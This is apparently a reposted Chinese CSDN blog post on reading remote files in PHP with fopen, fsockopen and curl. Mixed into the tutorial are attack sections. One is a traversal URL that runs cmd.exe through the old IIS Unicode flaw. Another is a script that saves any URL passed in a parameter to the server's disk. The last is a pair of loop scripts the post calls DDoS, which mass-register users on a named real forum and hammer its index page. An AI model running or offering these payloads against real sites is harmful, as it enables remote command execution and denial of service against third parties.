PHP获取远程文件内容

最新推荐文章于 2022-10-09 19:25:27 发布
最新推荐文章于 2022-10-09 19:25:27 发布
阅读量740 收藏
点赞数
分类专栏: Php / Pear / Mysql / Node.js 文章标签: PHP FP Scheme RedHat 应用服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_5904/article/details/81999162
版权

 

一、 介绍

只要在 php.ini 文件中激活了 allow_url_fopen 选项,您可以在大多数需要用文件名作为参数的函数中使用 HTTP 和 FTP URL 来代替文件名。同时,您也可以在 include()、include_once()、require() 及 require_once() 语句中使用 URL。PHP 所支持协议的更多信息参见 附录 J。

注: 要在 PHP 4.0.3 及其以后版本中使用 URL,您需要用 --enable-url-fopen-wrapper 参数来配置 PHP。 Windows 版本的 PHP 4.3 版之前不支持以下函数的远程访问:include(),include_once(),require(),require_once() 以及 参考 XLI, 图像函数库 扩展库中的 imagecreatefromXXX 函数。
例如,您可以用以下范例来打开远程 WEB 服务器上的文件,解析您需要的输出数据,然后将这些数据用在数据库的检索中,或者简单地将其输出到您网站剩下内容的样式匹配中。

例子 x. fopen() 例子 

<?php
$handle = fopen ("/home/rasmus/file.txt", "r");
$handle = fopen ("/home/rasmus/file.gif", "wb");
$handle = fopen ("http://www.example.com/", "r");
$handle = fopen ("ftp://user:password@example.com/somefile.txt", "w");
?>
 

例子 X. 获取远程文件的标题 

<?php
$file = fopen ("http://www.example.com/", "r");
if (!$file) {
echo "<p>Unable to open remote file.\n";
exit;
}
while (!feof ($file)) {
$line = fgets ($file, 1024);
/* This only works if the title and its tags are on one line */
if (eregi ("<title>(.*)</title>", $line, $out)) {
$title = $out[1];
break;
}
}
fclose($file);
?>
 
如果您用有合法的访问权限,以一个用户的身份和某 FTP 服务器建立了链接,您还可以向该 FTP 服务器端的文件进行写操作。您仅能用该方法来创建新的文件;如果您尝试覆盖已经存在的文件,fopen() 函数的调用将会失败。

要以“anonymous”以外的用户名连接服务器,您需要指明用户名(甚至密码),例如“ ftp://user: password@ftp.example.com/path/to/file”。(如果通过 HTTP 协议访问远程文件时需要基本身份认证,您也可以用使用的语法。)

例子 X. 远程服务端的数据存储 

<?php
$file = fopen ("ftp://ftp.example.com/incoming/outputfile", "w");
if (!$file) {
echo "<p>Unable to open remote file for writing.\n";
exit;
}
/* Write the data here. */
fputs ($file, $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose ($file);
?>
 
注: 您或许可以从以上范例中得到启发,用该技术来存储远程日志文件。但是正如以上提到的,在用 fopen() 方式打开的 URL 中,您仅能对新文件进行写操作。如果远程文件已经存在 fopen() 函数的操作将会失败。要进行类似的分布式日志操作,您可以参考 syslog() 函数。

在下面的内容里,我将以更多的实例描述这种功能的应用。

二、PHP中的POST&GET的应用

要使用PHP的POST&GET,可以运用fsockopen函数:

例子 1. fsockopen() Example 

<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
if (!$fp) {
  echo "$errstr ($errno)<br />\n";
} else {
  $out = "GET / HTTP/1.1\r\n";
  $out .= "Host: example.com\r\n";
  $out .= "Connection: Close\r\n\r\n";
  fputs($fp, $out);
  while (!feof($fp)) {
    echo fgets($fp, 128);
  }
  fclose($fp);
}
?> 
 

例子 2. Using UDP connection 

<?php
$fp = fsockopen("udp://127.0.0.1", 13, $errno, $errstr);
if (!$fp) {
  echo "ERROR: $errno - $errstr<br />\n";
} else {
  fwrite($fp, "\n");
  echo fread($fp, 26);
  fclose($fp);
}
?> 
 
例子 3 

<?php
//定义一些连接参数
$urls = array(
'host'=>'localhost',
'port'=>80,
'path'=>'/index.php',
'method'=>'POST',
'protocol'=>'1.0',
);
//POST方法传递的参数
$ps = array(
'language'=>'php',
'linux'=>'redhat',
);
//GET方法传递的参数
$gs = array(
'php'=>5,
'redhat'=>9
);
/**
返回:得到POST或GET方法后返回的字符串(string)
参数:
  $usls : string
  $ps : array
  $gs : array
调用方法:
  getData($urls,$ps,'') //使用POST方法
  getData($urls,'',$gs) //使用GET方法
参考资料:http://cn.php.net/manual/en/function.fsockopen.php
*/
function getData($urls,$ps='',$gs=''){
  $host = $urls['host'];
  $port = $urls['port'];
  $path = $urls['path'];
  $method = $urls['method'];
  $protocol = $urls['protocol'];
  $posts = '';
  $gets = '';
  if(is_array($ps)){
    foreach($ps as $k => $v){
      $posts .= urlencode($k)."=".urlencode($v).'&';
    }
    $posts = substr($posts,0,-1);
    $len = strlen($posts);
  }
  if(is_array($gs)){
    foreach($gs as $k => $v){
      $gets .= urlencode($k)."=".urlencode($v).'&';
    }
    $gets = substr($gets,0,-1);
  }
  $fp = fsockopen($host, $port,$errno,$errstr,3);
  if(!$fp){
    echo "can't connect...\r\n<br>Error:$errstr";
    return ;
  }
  fputs($fp, "$method $path?$gets HTTP/$protocol\r\n");
  fputs($fp, "Host: localhost\r\n");
  if($posts != ''){
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-Length: $len\r\n");
    fputs($fp, "\r\n");
    fputs($fp, $posts);
  }
  fputs($fp, "Connection: Close\r\n\r\n");
  $s = '';
  do{
   $data = fgets($fp,1024);
   if($data == '') {
     break;
   }
   $s .= $data;
  } while(true);
  fclose($fp);
  return $s;
}
//这里是使用POST方法取得目标网页返回的字符串
echo getData($urls,$ps,'');
//如果要使用GET方法就用如下方式:
echo getData($urls,'',$gs);
?>
 
三、UNICODE漏洞攻击

代码: 

<?php
$fp=@fopen($url,"r") or die ("cannot open $url");
while($line=@fgets($fp,1024)) {
$contents.=$line;
}
echo $contents; //显示文件内容
fclose($fp); //关闭文件
?>
 
使用:
/XXXX.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir

四、WEB间文件转移:

该例子的代码引自PHP FLAME: 

<?php
$fp = fopen($_GET['filename'], 'rb');
$data = $tmp = '';
while ( true ) {
$tmp = fgets($fp, 1024);
if ( 0 === strlen($tmp) ) {
break;
}
$data .= $tmp;
}
fclose($fp);
$file=preg_replace("/^.+\//","",$filename);
//write
$fp = fopen("$file", 'wb');
fwrite($fp, $data);
fclose($fp);
?>
 
五、HTTP代理(http://jsw.china12e.com/600/)

代码引自PHP FLAME: 

<?
$url = getenv("QUERY_STRING");
if(!ereg("^http",$url))
{
echo "example:<br>xxx.php?http://jsw.china12e.com/<;br>";
exit;
}
if($url)
$url=str_replace("\\","/",$url);
$f=@fopen($url,"r");
$a="";
if($f)
{
while(!feof($f))
$a.=@fread($f,8000);
fclose($f);
}
$rooturl = preg_replace("/(.+\/)(.*)/i","\\1",$url);
$a = preg_replace("/(src[[:space:]]*=['\"])([^h].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(src[[:space:]]*=)([^h'\"].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=)([^h'\"].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=[^'\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=[^'\"])(.*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=['\"])(.*?)/is","\\1$rooturl\\2",$a);
echo $a;
?>
 
六:不可阻挡DDOS攻击

DDOS的一个例子 

<?php
$url="http://bbs.icehack.com/register.php?step=2&addpassword=aaaaaa&addpassword2=aaaaaa&addemail=asdfasd@dfsadsf.com&addusername=";
for($i=1131;$i<=1150;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
 
运行后论坛将新增20个用户
(例子: http://bbs.icehack.com/userlist.php?page=827)
当把它用在论坛的搜索中时
DDOS攻击就实现了
以下的代码攻击INDEX.PHP文件,同时运行十个进程时,可能时论坛关闭 

<?php
$url="http://bbs.icehack.com/index.php?addusername=";
for($i=1131;$i<=1180;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
 
完整URL地址:
http://username:password@hostname/path?arg=value#auchor

协议:http://
用户名和密码: username:password  以:将两者分隔
主机名:hostname @和/为分隔符
路径: /path 以/开头、包含/符号
参数键值对: arg=value&arg1=value1 ?和#为分隔符、每对键值对之间用&分隔
锚:auchor  以#开头 

用parse_url()获取相关信息 

$url = "http://www.electrictoolbox.com/php-extract-domain-from-full-url/";
$parts = parse_url($url); 

//
Array 

( 

[scheme] => http 

[host] => www.electrictoolbox.com 

[path] => /php-extract-domain-from-full-url/ 

)
  
<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);

//

Array
(
[scheme] => http
[host] => hostname
[user] => username
[pass] => password
[path] => /path
[query] => arg=value
[fragment] => anchor
)
 
可以看到,可以很容易分解出一个URL的各个部,那如果要拿指定的部分出来的话也很容易,如
echo parse_url($url, PHP_URL_PATH);
就是在第二个参数中,设定如下的参数:
PHP_URL_SCHEME, PHP_URL_HOST, PHP_URL_PORT, PHP_URL_USER, PHP_URL_PASS, PHP_URL_PATH, PHP_URL_QUERY or PHP_URL_FRAGMENT.


七、最后还有一个 

if ( !function_exists( 'fopen_url' ) ) 
{
    function fopen_url($url) 
    { 
        $file_content = '';
        
        if (function_exists('file_get_contents')) $file_content = @file_get_contents($url); 
        elseif (ini_get('allow_url_fopen') && ($file = @fopen($url, 'rb')))
        { 
            $i = 0; 
            while (!feof($file) && $i++ < 1000) $file_content .= strtolower(fread($file, 4096)); 
            fclose($file); 
        } 
        elseif (function_exists('curl_init')) 
        { 
            $curl_handle = curl_init(); 
            curl_setopt($curl_handle, CURLOPT_URL, $url); 
            curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT,5); 
            curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER,1); 
            curl_setopt($curl_handle, CURLOPT_FAILONERROR,1); 
            curl_setopt($curl_handle, CURLOPT_USERAGENT, 'Trackback Spam Check'); 
            $file_content = curl_exec($curl_handle); 
            curl_close($curl_handle); 
        } 
        
        return $file_content; 
    }
}
 



关联:



iteye_5904
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php获取远程文件内容的函数
10-23
主要介绍了关于php获取远程文件内容的函数代码,使用这个函数也可以获取图片
php 读写远程文件内容,php获取远程文件内容的函数
weixin_29043895的博客
03-11 539
php获取远程文件内容的函数一个简单的php获取远程文件内容的函数代码,兼容性强。直接调用就可以轻松获取远程文件内容,使用这个函数也可获取图片。代码如下:/*** 读远程内容* @return string*/function get_url_content($url){if(function_exists("curl_init")){$ch = curl_init();$timeout = 3...
php获取远程文件内容吗,php获取远程文件内容的函数,
weixin_39815286的博客
03-25 64
php获取远程文件内容的函数,一个简单的php获取远程文件内容的函数代码,兼容性强。直接调用就可以轻松获取远程文件内容,使用这个函数也可获取图片。代码如下:/*** 读远程内容* @return string*/function get_url_content($url){if(function_exists("curl_init")){$ch = curl_init();$timeout = ...
PHP 获取远程文件内容的函数代码
10-29
以下是基于给定文件中提供的代码,详细解读PHP获取远程文件内容的知识点。 1. 使用`file_get_contents`函数: `file_get_contents`函数用于读取文件内容。它能够直接读取HTTP或者FTP等协议的远程文件。使用此...
php获取远程文件内容和大小
12-18
1、获取远程文件内容的方法 2、获取远程文件大小的方法 以上就是php获取远程文件内容和大小函数代码,希望对大家的学习有所帮助。 您可能感兴趣的文章:php下载远程文件类(支持断点续传)PHP 远程文件管理,可以...
PHP获取远程文件信息
人在旅途
05-30 209
[code="PHP"] $url = 'http://.../config'; $username = 'username'; $password = 'password'; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($...
PHP远程获取文件
04-22
PHP进行远程获取文件、实现了跨服务器获取文件
使用PHP读取远程文件的四种方法
liken的专栏
08-09 2465
转自:http://www.qiandabao.com/wdgz/47.html 使用PHP读取远程文件的四种方法 1 fopen() 2 file_get_contents() 3 curl 4 socket fopen()和file_get_contents()需要在php.ini配置文件中设置allow_url_open = on fopen(): $hand
PHP下载远程文件获取文件内容
weixin_34392906的博客
11-12 314
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 6...
同一域名对应多个IP时,PHP获取远程网页内容的函数
东杰书屋
12-04 804
<br />PHP获取远程网页内容有多种方式,例如用自带的file_get_contents、fopen等函数。<br /><?php   <br />echo file_get_contents("http://blog.s135.com/abc.php");  <br />?>但是,在DNS轮询等负载均衡中,同一域名,可能对应多台服务器,多个IP。假设blog.s135.com被DNS解析到72.249.146.213、72.249.146.214、72.249.146.215三个IP,用户每次访问bl
PHP:使用远程文件
最新发布
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-09 383
PHP:使用远程文件
PHP获取远程文件的三种方法
weixin_34384915的博客
10-27 70
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP访问远程文件
LSGOZJ的博客
09-29 1108
PHP访问远程文件,需要在php.ini中把allow_url_fopen打开,现在较高版本的php默认是打开的我们可以用fopen()函数进行访问,用fread(‘文件资源变量’,’最大字节数’)进行读取。 (注意:如果只是想将一个文件内容读入到一个字符串中,官方推荐使用file_get_contents()函数,他的性能比fread()好)例子1:获取百度首页并输出//打开远程文件 $fp
php 读取远程方法,PHP读取远程文件的三种方法
weixin_26704651的博客
04-01 1514
PHP读取远程文件的几种方法总结及区别分析。1.file_get_contents$url = 'http://www.xxx.com/';$contents = file_get_contents($url);//如果出现中文乱码使用下面代码//$getcontent = iconv(“gb2312″, “utf-8″,file_get_contents($url));//echo $getco...
php 访问远程文件,在php读取远程文件
weixin_30928785的博客
03-10 110
选项1 – 卷曲使用CURL并将CURLOPT_FOLLOWLOCATION选项设置为true:$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http//example.com");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ch, CURLOPT_RETURNTRANS...
PHP远程文件访问:安全挑战与解决策略
"这篇文档是关于PHP的介绍和安全问题的探讨,主要涉及远程文件访问、PHP安装步骤、注册全局变量的问题、程序编写注意事项、文件上传、Session安全以及其他安全注意事项,并提供了参考资料。" 在PHP中,远程文件访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值